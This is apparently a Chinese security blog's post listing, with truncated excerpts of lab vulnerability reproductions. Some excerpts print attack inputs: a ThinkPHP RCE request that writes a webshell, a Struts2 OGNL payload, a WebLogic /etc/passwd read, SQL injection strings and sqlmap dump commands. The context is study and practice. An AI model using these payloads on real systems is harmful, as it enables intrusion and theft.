- 博客(44)
- 收藏
- 关注
原创 简单静态路由配置
【实验目的】学习静态路由的配置,通过实验理解路由器的工作原理。【知识点】路由器的工作原理,静态路由的作用。【实验场景】两台PC处于不同网段,通过两台路由器相连,现在需要实现两台主机可以互相访问。【实验原理】不同主机在进行跨网段通信时,需要依靠路由器的选路。数据到达路由器后,通过查看路由 表得知去往目的地址的下一跳、出接口等信息,把数据发送给下一跳即可。对于路由器来说, 构建路由表时依靠的是目的地址,也就是路由器只需要了解去往目的时把数据发送给谁,不 需要了解整个通信过程都经过了谁。静态路由就是
2022-05-07 19:14:50
142
原创 Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2二级标题
2022-04-22 14:23:46
1039
原创 docker安装bwapp漏洞实验环境 并复现逻辑漏洞中暴力破解实验
docker search bwappdocker pull raesene/bwappdocker imagesdocker run -it -d -p 8080:80 332docker pshttp://192.168.15.136:8080/install.php复现跑出来账号是 bee 密码是 bug暴力破解的原理就是使用攻击者自己的用户名和密码的字典,一个一个去尝试,尝试是否能够登录,未爆破成功原因就是自有的字典里面的没有这个所需要暴力 用户名和密码的这个
2022-04-18 15:05:44
2620
原创 Nginx 解析漏洞复现
Nginx 解析漏洞复现该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞http://192.168.15.136/uploadfiles/nginx.pnghttp://192.168.15.136/uploadfiles/nginx.png/.phphttp://192.168.15.136/123.jpghttp://192.168.15.136/123.jpg/123.php...
2022-04-15 16:39:22
4594
原创 Apache HTTPD 多后缀解析漏洞复现
Apache HTTPD 多后缀解析漏洞复现Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别
2022-04-15 16:36:14
2799
原创 Apache SSI 远程命令执行漏洞复现
Apache SSI 远程命令执行漏洞复现如果目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用语法执行任意命令。...
2022-04-15 16:34:00
119
原创 漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞
weblogic 文件读取漏洞访问http://192.168.15.136:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件:
2022-04-13 20:04:10
266
原创 漏洞复现(vulhub漏洞复现) (1)weblogic管理控制台未授权远程命令执行漏洞复现 (2) Weblogic SSRF漏洞漏洞复现
weblogic管理控制台未授权远程命令执行漏洞复现Weblogic SSRF漏洞漏洞复现虚拟机同时运行了 redis、Weblogic 两个容器http://192.168.15.136:7001/uddiexplorer/http://192.168.15.136:7001/uddiexplorer/SearchPublicRegistries.jsphttp://192.168.15.136:7001/uddiexplorer/SearchPublicReg
2022-04-13 19:42:40
1243
原创 vulhub Apache HTTPD 多后缀解析漏洞漏洞复现
vulhub Apache HTTPD 多后缀解析漏洞漏洞复现漏洞原理:在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。...
2022-04-13 19:29:25
121
原创 vulhub tomcat put方法任意写文件漏洞 tomcat弱口令漏洞
tomcat put方法任意写文件漏洞发送到repeater,修改GET请求为PUTtomcat弱口令漏洞点击shellhttp://192.168.15.131:8080/shell/shell.jsp?cmd=ip%20addr
2022-04-13 19:02:20
628
原创 vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞
vulhub漏洞复现Apache Shiro 1.2.4反序列化漏洞Apache Shiro 认证绕过漏洞shiro反序列化漏洞有何特征?如何防御shiro反序列化漏洞Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编
2022-04-13 18:55:47
1502
原创 phpmyadmin scripts/setup.php 反序列化漏洞 S2-001远程代码执行漏洞复现漏洞要求:
phpmyadmin scripts/setup.phpS2-001远程代码执行漏洞复现漏洞我们在密码处输入:%{2*2}会回显出执行的结果,说明漏洞可能存在%{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+“}”}%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get(“com.opensymp
2022-04-12 17:02:59
267
原创 复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
ThinkPHP5 5.0.23远程代码执行漏洞http://159.75.16.25:8089/index.php?s=captcha会出现如下报错F12进入开发者 用HackBar 插件发送 POST 请求得到回显:通过echo命令写入 Webshell 文件首先将一句话木马进行 Base64 编码_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE
2022-04-12 16:58:34
574
原创 使用docker搭建sqli-lab环境以及upload-labs环境 xss挑战之旅环境 搭建vulhub环境
sqli-lab环境1)查找sqli-lab环境 docker search sqli-labs2)拉取镜像 docker pull acgpiano/sqli-labs3) docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labsupload-labs环境)查找镜像docker search upload-labsxss挑战之旅环境拉取镜像docker search xssdocker pull wushan
2022-04-12 16:45:50
558
原创 510cms使用手工注入挂下一句话木马 中国菜刀 蚁剑 挂马连接510cms网站 分别使用navicat和sqlmap进行udf提权
我们知道此处有注入 使用order by 确定他的字段值order by 得出 字段值是7判断出来回显位数是4
2022-04-12 16:29:13
625
原创 1.只有本地管理员才能访问本页面2.notes Happy Why am lfeeling so happy today? Well ljust got to spend threedays with
只有本地管理员才能访问本页面F12 看看源码 没啥东西御剑看看后台也没看出来有啥 看了下 需要管理员权限 在headers里面设置 添加一行X-Forwarded-For127.0.0.1flag{sgwxsSesSD232se14sdSVSsx}notesHappyWhy am lfeeling so happy today? Well ljust got to spend threedays with some of my very best friends having fun t
2022-04-12 16:17:28
2806
原创 中国红客联盟-,显示的是此网站存在漏洞,请及时修复…
显示的是此网站存在漏洞,请及时修复…登录进去看看 先放在御剑里面后台扫下等待扫描结束后,发现有一个shell.php的文件,双击打开试一试这个时候打开的网页显示需要输入密码,先随便输入一个用burp suite 进行爆破,输入密码,打开网页拦截进行抓包选中所输入的密码,右键点击send to Intruder及爆破的页面,点击Intruder的Positions的选项来查看爆破对象点击Payloads选项,在Payload Options的模块里先选择字典然后点击右上角的Start a
2022-04-12 16:03:32
947
原创 Windows操作命令
vm tools 安装出错1.根据报错 解决 操作系统版本问题2.Windows 远程桌面服务 默认使用端口 3389开启远程桌面服务 右击计算机-控制面板-高级系统属性-远程设置-远程协助-允许任意版本连接 (公网上Windows 服务器 不建议开启)需要远程协助机 查看自己ip地址 Win+R cmd 命令 ipconfig宿主机 远程桌面连接 win+r mstsc 输入目标的IP地址3.ftp服务Windows server 针对服务器 防火墙默认关闭 Windows 个
2022-04-12 15:53:24
199
原创 sql注入的方式
二,求列数http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23二分法三、求显示位实际为报错位四、爆数据库版本号id=-1’ union select 1,2,version() – +五、爆当前数据库名id=-1’ union select 1,2,database() --+查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) fr
2022-04-11 20:40:15
335
原创 计算机网络
标识ipPc0主机Server0Pc1Pc2Server1路由器router0Gig0/0Gig0/1路由器Port status 记得启动三层网络配置vlan IP地址
2022-04-11 20:31:53
825
原创 路由汇总及默认路由 (计算机网络)
标识IP地址配置接口地址PC0 ping 76.12.32.254PC1 ping76.12.69.254PC2 ping192.168.1.254最后尝试三台主机互相ping,均可以ping通
2022-04-11 20:26:40
300
原创 welcome to loading bay control system. please input username to retrieve key 记录下 sqlmap
welcome to loading bay control system. please input username to retrieve key御剑试一下跑出来用户名’or’‘=’列出所有数据库:sqlmap -u “http://xxx” --dbs列出当前数据库:sqlmap -u “http://xxx” --current-db(2)读取表sqlmap -u “http://xxx” -D 库名 --tables(3)读取数据表中的字段名sqlmap -u
2022-04-11 20:20:01
359
原创 sqlmap sqli less-1
python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1”python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -dbspython sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -D security -tablespythonpython sqlmap.py -u “http://192.168.1..
2022-04-11 20:11:28
613
原创 windows下安装sqlmap
SqlMap一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时
2022-04-11 20:08:50
1115
原创 74cms
将这个74cms的upload目录设置为网站根目录,使用目录扫描工具进行扫描,然后使用burpsuite对后台地址用户名和密码进行爆破。外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vz7TMzdB-1649678567118)(![https://img-blog.csdnimg.cn/fa8e0f36afe149218e3c1549728fe6f1.png)]爆出来用户名admin 密码root...
2022-04-11 20:03:53
590
原创 less-11的注入操作
在火狐浏览器下载foxyproxy 配置好之后 打开第十一个题目在burpsuite 右击选择 send repeater 根据题目加一个’尝试一下uname=admin’ and 1=1 --+&passwd=admin&submit=Submituname=admin’ and 1=2 --+&passwd=admin&submit=Submitand 1=2 --+恒为假是,执行错误,发现注入点是基于单引号的字符型注入判断字段uname=admin
2022-04-11 19:59:37
136
原创 Less-32宽字节注入练习
宽字节: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。中文、韩文、日文等均存在宽字节,英文默认都是一个字节。在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题。例子: id= 1’ 处理 1 \’ 进行编码 1%5c%27 带入sql后 id = \’ a
2022-04-11 19:47:38
201
原创 centos7 linux 而忘记自己创建的用户和root用户所设置的密码 登录到此操作系统
因为太长时间没有使用centos7 linux,从而忘记自己创建的用户和root用户所设置的密码,无法登录centos操作系统。把鼠标光标放置虚拟机内,使用↑和↓将选择行设置为第一行(背景高亮即为选中),按下键盘上的e,进入编辑模式按方向键↑和↓,将光标一直移动到 LANG=en_US.UTF-8 后面,再添加“_init=/bin/sh” (_为空格键)。这里特别注意,需要写在UTF-8后,保持在同一行,并注意空格不能缺。有些虚拟机由于屏幕太小,会自动添加\换行,这个是正常的。按下CTRL+X
2022-04-10 20:02:25
1645
原创 VulnHub--DC-1--flag
配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段)查看net模式下的网段 192.168.15.0我们查看一下kali的IP地址 kali的IP192.168.15.142Nmap -Sp 192.168.15.0/24扫描存活主机我们就的到了DC-1的ip192.168.15.143我们扫描一下看下开放的端口目标靶机开放ssh远程连接服务,HTTP服务whatweb http://192.168.15.143扫描网站指纹信息或者使用火狐所带的
2022-04-08 22:05:03
349
原创 kali英文转换成中文
dpkg-reconfigure localesroot用户可直接执行dpkg-reconfigure locales命令 否则切换成root用户找到en_US.UTF-8 UTF-8选项,按空格键将其进行取消找到 [ ] zh-CN.UTF-8.UTF-8两个选项,使用空格将[ ] zh-CN.UTF-8.UTF-8其勾选上按下回车 选择zh_CN.UTF-8字符编码 再次按下回车配置完毕reboot重启...
2022-04-08 16:30:45
191
原创 VulnHub--Me-and-My-Girlfriend-1
背景有两个恋人,即Alice和Bob,这对夫妻本来很浪漫,但是自从Alice在一家私人公司“Ceban Corp”工作以来,爱丽丝对鲍勃的态度发生了一些变化是“隐藏”的,而鲍勃(Bob)寻求您的帮助,以获取爱丽丝(Alice)隐藏的内容并获得对该公司的完全访问权限!需求Me-and-My-Girlfriend-1 虚拟机Kali Linux 2021复现调一下kali 设置 root权限这个是mygirlfrienf 的net 网段在192.168.227.0Kali的网段也是在19
2022-04-04 15:08:34
1400
原创 用net user 这个命令新建一个叫wanger一个普通用户,然后赋予wanger管理员的权限,并且加以验证
用管理身份运行 cmd命令 输入 net user 查看自己电脑用户输入 net user 用户名 密码 /add 新建一个wanger密码4321 的用户再次查看用户 存在新建的用户wanger输入 net localgroup administrators 用户 /add 使wanger用户分入 管理员分组输入 net localgroup administrators 查看是否把wanger用户分入管理员分组net usernet user (1)查看自己当前计算机所有用户(2)新
2022-03-31 10:57:59
3117
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人